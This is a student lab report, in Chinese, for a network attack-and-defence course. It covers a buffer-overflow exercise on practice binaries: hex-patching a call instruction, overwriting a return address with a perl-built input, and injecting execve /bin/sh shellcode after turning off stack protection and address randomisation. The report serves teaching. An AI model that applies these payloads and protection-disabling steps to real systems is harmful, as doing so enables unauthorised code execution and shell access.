2018-2019-2 20165210《网络攻防技术》Exp1 PC平台逆向破解(BOF实验)
实验分为三个部分:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数
- 注入一个自己制作的shellcode并运行这段shellcode。
这几种思路,基本代表现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
以及注入运行任意代码。
一、直接修改程序机器指令,改变程序执行流程
- 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
- 学习目标:理解可执行文件与机器指令
- 进阶:掌握ELF文件格式,掌握动态技术
首先:反汇编20165210_1文件
objdump -d pwn1
反汇编结束后你发现:main函数里面有一步call 804891,机器码指令为e8 d7 ff ff ff。进一步分析:08048491是,0804847d是我们的跳转目标。
0x08048491 - 0x0804847d = 0x00000014 //计算地址差
0xffffffd7 - 0x00000014 = 0xffffffc3 //计算要篡改的目标地址
然后进入编辑文件,然后发现全是乱码,使用
:%!xxd
转换为16进制,用
/e8d7
找到以后按i进入插入模式,修改d7为c3,用
:%!xxd -r
换回乱码的状态,然后保存,再次
objdump -d 20165210_1
就成功了
二、通过构造输入参数,造成BOF攻击,改变程序执行流
缓冲区溢出攻击,即BOF攻击。简单的说就是不合法的输入把子函数的返回地址覆盖掉了,通过这种方式修改函数的返回地址,使程序代码执行“意外”的流程。
使用gdb命令,file 20165210_2载入20165210_2文件,r运行
可以看到图中
0x6c6c6b6b in ?? ()
6c是l的ASCII码值6b是k的ASCII码值
所以根据内容1中的getshell内存地址,修改输入字符串(注意要将实际地址反序录入),然后利用prel构建输入文件。
perl -e 'print "aaaaaaaassssssssddddddffffgghhjj\x7d\x84\x04\x08\x0a"' > input
Perl -e:用于在命令行而不是在脚本中执行 Perl 命令;“|”管道:将第一条命令的结果作为第二条命令的参数来使用;
然后用cat命令:
(cat input; cat ) | ./20165210_2
然后就成功了
三、注入Shellcode并执行
首先;下载execstack并安装
apt-get install execstack
设置堆栈可执行:
execstack -s 20165210_3 //设置堆栈可执行
execstack -q 20165210_3 //查询文件的堆栈是否可执行
关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space
查询地址随机化是否关闭(0代表关闭,2代表开启)
more /proc/sys/kernel/randomize_va_space
整个过程中我们需要注入一段代码,和实验二里面使用的perl类似,我们首先构造一个input_shellcode:
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
首先在一个窗口运行
(cat input_shellcode;cat) | .20165210_3;
在另外一个窗口
ps -ef | grep 20165210_3
能看见当前运行20165210_3的进程号;
在gdb里面attach 进程号进行调试,(gdb) disassemble foo反编译,设置断点,然后into r esp。
0xffffd2fc+0x000004=0xffffd300
然后修:改shellcode中的内容:
perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input-shellcode
运行:
(cat input-shellcode;cat) | ./20165210_3
四、过程中遇到的困难:
- 首先就是内容一中的将乱码转换为16进制,然后我改完没有再转回乱码,直接保存了,发现就不能反汇编了。
- 也是内容一就是找e8d7怎么找都找不到,/d7不行/e8不行/e8d7不行,最后打了/e8 d7才成功
- 最后还有就是内容三的设置断点阶段,我输入了continue发现在continuing就不动了,然后发现另一个终端还要回车一下(我也不是很懂为什么要回车),然后就可以继续进行了。